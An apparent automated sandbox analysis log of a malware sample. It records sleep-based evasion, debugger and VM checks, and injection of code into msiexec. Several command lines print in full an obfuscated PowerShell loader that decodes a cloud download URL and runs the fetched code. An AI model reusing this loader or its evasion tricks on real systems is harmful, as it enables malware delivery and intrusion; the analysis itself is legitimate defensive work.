              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597438Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597313Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597188Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597075Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596953Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596844Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596735Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596610Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596495Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596375Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596266Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596143Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596028Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595914Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595797Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595685Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595563Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595452Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595336Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595219Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595094Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594950Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594838Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594725Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594608Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594373Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594262Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594141Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5545Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4323Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8153Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1476Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2488Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -27670116110564310s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6340Thread sleep count: 3931 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -599890s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6340Thread sleep count: 5889 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -599769s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -599641s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -599531s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -599418s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -599297s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -599188s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -599063s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -598937s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -598828s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -598719s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -598609s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -598500s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -598391s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -598266s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -598141s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -598032s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -597907s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -597782s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -597672s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -597563s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -597438s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -597313s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -597188s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -597075s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -596953s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -596844s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -596735s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -596610s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -596495s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -596375s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -596266s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -596143s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -596028s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -595914s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -595797s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -595685s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -595563s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -595452s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -595336s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -595219s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -595094s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -594950s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -594838s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -594725s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -594608s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -594485s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -594373s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -594262s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336Thread sleep time: -594141s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599769Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599641Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599531Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599418Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599297Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599188Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599063Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598937Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598828Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598719Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598609Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598500Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598391Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598266Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598141Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598032Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597907Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597782Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597672Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597563Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597438Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597313Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597188Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597075Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596953Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596844Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596735Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596610Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596495Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596375Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596266Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596143Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596028Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595914Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595797Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595685Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595563Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595452Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595336Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595219Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595094Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594950Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594838Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594725Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594608Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594373Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594262Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594141Jump to behavior
              Source: wscript.exe, 00000000.00000003.1714879318.0000024C0F823000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\0
              Source: powershell.exe, 00000001.00000002.1957262692.000002681DAA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0043F5C0 LdrInitializeThunk,8_2_0043F5C0

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: Yara matchFile source: amsi64_3300.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5432, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4090000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#besprjtet playstow stunsail vrangforestillingers ergotisms idealism overthrowing #>;$requestionerntrenchant='gem';<#formanings reaktion randmorner backwall protore #>;$oplyser=$syriacism+$host.ui; function franarrendes($kampucheanske){if ($oplyser) {$grangerizer++;}$automobiler=$forsnakket+$kampucheanske.'length'-$grangerizer; for( $requestioner=5;$requestioner -lt $automobiler;$requestioner+=6){$heavenward214=$requestioner;$ressentimentsflelsers+=$kampucheanske[$requestioner];$spindleshanks='nougatfarvede255';}$ressentimentsflelsers;}function forbindingers($sweateren){ . ($leukophoresis) ($sweateren);}$modulariteten85=franarrendes 'rum em lunnono anzkonkui zircl enerl annaaoffgo/ expe ';$modulariteten85+=franarrendes 'forha5genn..olief0munde qeth(kamlewd speiw.rloniag tdgrundotyd.lwnordis.inds st rn undetvolun aphyl1found0orrtr. fart0dunel;attem roomw.ettiikonomnre dd6 anab4 ach ; tand s.mpsxchamp6torve4snkni;n.mph carbor vaa vunder:forby1agnat3foreb1hydro. nond0 m ga)bolig filmsg b koesviencm notkdesmoobet t/sp ci2disfo0frak,1curvi0klim 0enfol1na ur0 fops1 sni tandpf mageisobraraftrae,ofanf indioinvarxsaftf/skole1sky r3yderp1 para.adven0fall ';$regnetegnet=franarrendes 'niffeu sonospreleestamsrloz n-frontavideogpo.uledi denfejletnowel ';$delggelses=franarrendes 'brookhtsnintunpertunasspodon scentr: aan/ bygn/pr.grdd,sgerudnytiflsomv non ewoods.omheggdhurroskr aoinfleghelpilh lefelinne.photocno.gao iphom varm/avl.surebubc abru?i.kviekomp,xko tep.piskoover rbriskt en e=prosed fvnnounig,wbu.den fjenl arusocen rasaggidret r&klenei omveddof m= ktio1saltio emoub.otlcbac sv emulaappetkpseu,urespicpugenytim rfcrocugankomsklemry versls,jlges ewa0aaref-f remrkendiuonla 3wa rguelvilz klbnk diffn sdnidbog,vesemid2 .emia.ittelsyfilm semijune lpomdig ';$coleopteroid=franarrendes 'coff >disge ';$leukophoresis=franarrendes 'v,ticiwoundeci.enxsynon ';$requestionernkassoerne='papyroplastics';$kontagis='\platyhelminthic195.end';forbindingers (franarrendes 'knivs$spisegg ssel skijol,nkbbra zia remrld.gab: v,ewdchinbe acuicy,lloapeachrsnoenbrhabdomen on mi.tyantihl sta.afavo.tu stoesysteddextr= coar$remuseen.rvntransvsan.s:gtebaa sikkpp ethpdi pedpunteastunntforlgabackn+sekul$.romak,ermuohazanngreevtindvaariob,gcymbeigenfostraum ');forbindingers (franarrendes 'cuisi$c,liiglingel arado.ommebwhip areboullabio: frigldatasilobeltcurt hfrygtoti.anp brn hjeq ei flyvlrussiorektou eskysskudd=be ry$sabr dyokeaelachrlkie,egarbejgtergie frazl irrusinquieart is.orma.maghissm gepindvilu affisaddutlden.(rea i$tr,ckczigzaoudestlkar oe ieclolaspeppelortregnlebaronrnatioo cereikogendpark,) inct ');forbindingers (franarrendes 'hu,ba[ ,nten lasse guiltpedan.inse.senergeh vedrgnistvdivi.iin,rtcungd efortipfun,oo affaicloamncompitepichmbugh ab.rnenbarquanonutg altaeanaerrunpro]arbej: vndg: lumbssparserentec ,nteu semirwigeoi sluktchokiy mu kpgolemrspe c
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#besprjtet playstow stunsail vrangforestillingers ergotisms idealism overthrowing #>;$requestionerntrenchant='gem';<#formanings reaktion randmorner backwall protore #>;$oplyser=$syriacism+$host.ui; function franarrendes($kampucheanske){if ($oplyser) {$grangerizer++;}$automobiler=$forsnakket+$kampucheanske.'length'-$grangerizer; for( $requestioner=5;$requestioner -lt $automobiler;$requestioner+=6){$heavenward214=$requestioner;$ressentimentsflelsers+=$kampucheanske[$requestioner];$spindleshanks='nougatfarvede255';}$ressentimentsflelsers;}function forbindingers($sweateren){ . ($leukophoresis) ($sweateren);}$modulariteten85=franarrendes 'rum em lunnono anzkonkui zircl enerl annaaoffgo/ expe ';$modulariteten85+=franarrendes 'forha5genn..olief0munde qeth(kamlewd speiw.rloniag tdgrundotyd.lwnordis.inds st rn undetvolun aphyl1found0orrtr. fart0dunel;attem roomw.ettiikonomnre dd6 anab4 ach ; tand s.mpsxchamp6torve4snkni;n.mph carbor vaa vunder:forby1agnat3foreb1hydro. nond0 m ga)bolig filmsg b koesviencm notkdesmoobet t/sp ci2disfo0frak,1curvi0klim 0enfol1na ur0 fops1 sni tandpf mageisobraraftrae,ofanf indioinvarxsaftf/skole1sky r3yderp1 para.adven0fall ';$regnetegnet=franarrendes 'niffeu sonospreleestamsrloz n-frontavideogpo.uledi denfejletnowel ';$delggelses=franarrendes 'brookhtsnintunpertunasspodon scentr: aan/ bygn/pr.grdd,sgerudnytiflsomv non ewoods.omheggdhurroskr aoinfleghelpilh lefelinne.photocno.gao iphom varm/avl.surebubc abru?i.kviekomp,xko tep.piskoover rbriskt en e=prosed fvnnounig,wbu.den fjenl arusocen rasaggidret r&klenei omveddof m= ktio1saltio emoub.otlcbac sv emulaappetkpseu,urespicpugenytim rfcrocugankomsklemry versls,jlges ewa0aaref-f remrkendiuonla 3wa rguelvilz klbnk diffn sdnidbog,vesemid2 .emia.ittelsyfilm semijune lpomdig ';$coleopteroid=franarrendes 'coff >disge ';$leukophoresis=franarrendes 'v,ticiwoundeci.enxsynon ';$requestionernkassoerne='papyroplastics';$kontagis='\platyhelminthic195.end';forbindingers (franarrendes 'knivs$spisegg ssel skijol,nkbbra zia remrld.gab: v,ewdchinbe acuicy,lloapeachrsnoenbrhabdomen on mi.tyantihl sta.afavo.tu stoesysteddextr= coar$remuseen.rvntransvsan.s:gtebaa sikkpp ethpdi pedpunteastunntforlgabackn+sekul$.romak,ermuohazanngreevtindvaariob,gcymbeigenfostraum ');forbindingers (franarrendes 'cuisi$c,liiglingel arado.ommebwhip areboullabio: frigldatasilobeltcurt hfrygtoti.anp brn hjeq ei flyvlrussiorektou eskysskudd=be ry$sabr dyokeaelachrlkie,egarbejgtergie frazl irrusinquieart is.orma.maghissm gepindvilu affisaddutlden.(rea i$tr,ckczigzaoudestlkar oe ieclolaspeppelortregnlebaronrnatioo cereikogendpark,) inct ');forbindingers (franarrendes 'hu,ba[ ,nten lasse guiltpedan.inse.senergeh vedrgnistvdivi.iin,rtcungd efortipfun,oo affaicloamncompitepichmbugh ab.rnenbarquanonutg altaeanaerrunpro]arbej: vndg: lumbssparserentec ,nteu semirwigeoi sluktchokiy mu kpgolemrspe c
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#besprjtet playstow stunsail vrangforestillingers ergotisms idealism overthrowing #>;$requestionerntrenchant='gem';<#formanings reaktion randmorner backwall protore #>;$oplyser=$syriacism+$host.ui; function franarrendes($kampucheanske){if ($oplyser) {$grangerizer++;}$automobiler=$forsnakket+$kampucheanske.'length'-$grangerizer; for( $requestioner=5;$requestioner -lt $automobiler;$requestioner+=6){$heavenward214=$requestioner;$ressentimentsflelsers+=$kampucheanske[$requestioner];$spindleshanks='nougatfarvede255';}$ressentimentsflelsers;}function forbindingers($sweateren){ . ($leukophoresis) ($sweateren);}$modulariteten85=franarrendes 'rum em lunnono anzkonkui zircl enerl annaaoffgo/ expe ';$modulariteten85+=franarrendes 'forha5genn..olief0munde qeth(kamlewd speiw.rloniag tdgrundotyd.lwnordis.inds st rn undetvolun aphyl1found0orrtr. fart0dunel;attem roomw.ettiikonomnre dd6 anab4 ach ; tand s.mpsxchamp6torve4snkni;n.mph carbor vaa vunder:forby1agnat3foreb1hydro. nond0 m ga)bolig filmsg b koesviencm notkdesmoobet t/sp ci2disfo0frak,1curvi0klim 0enfol1na ur0 fops1 sni tandpf mageisobraraftrae,ofanf indioinvarxsaftf/skole1sky r3yderp1 para.adven0fall ';$regnetegnet=franarrendes 'niffeu sonospreleestamsrloz n-frontavideogpo.uledi denfejletnowel ';$delggelses=franarrendes 'brookhtsnintunpertunasspodon scentr: aan/ bygn/pr.grdd,sgerudnytiflsomv non ewoods.omheggdhurroskr aoinfleghelpilh lefelinne.photocno.gao iphom varm/avl.surebubc abru?i.kviekomp,xko tep.piskoover rbriskt en e=prosed fvnnounig,wbu.den fjenl arusocen rasaggidret r&klenei omveddof m= ktio1saltio emoub.otlcbac sv emulaappetkpseu,urespicpugenytim rfcrocugankomsklemry versls,jlges ewa0aaref-f remrkendiuonla 3wa rguelvilz klbnk diffn sdnidbog,vesemid2 .emia.ittelsyfilm semijune lpomdig ';$coleopteroid=franarrendes 'coff >disge ';$leukophoresis=franarrendes 'v,ticiwoundeci.enxsynon ';$requestionernkassoerne='papyroplastics';$kontagis='\platyhelminthic195.end';forbindingers (franarrendes 'knivs$spisegg ssel skijol,nkbbra zia remrld.gab: v,ewdchinbe acuicy,lloapeachrsnoenbrhabdomen on mi.tyantihl sta.afavo.tu stoesysteddextr= coar$remuseen.rvntransvsan.s:gtebaa sikkpp ethpdi pedpunteastunntforlgabackn+sekul$.romak,ermuohazanngreevtindvaariob,gcymbeigenfostraum ');forbindingers (franarrendes 'cuisi$c,liiglingel arado.ommebwhip areboullabio: frigldatasilobeltcurt hfrygtoti.anp brn hjeq ei flyvlrussiorektou eskysskudd=be ry$sabr 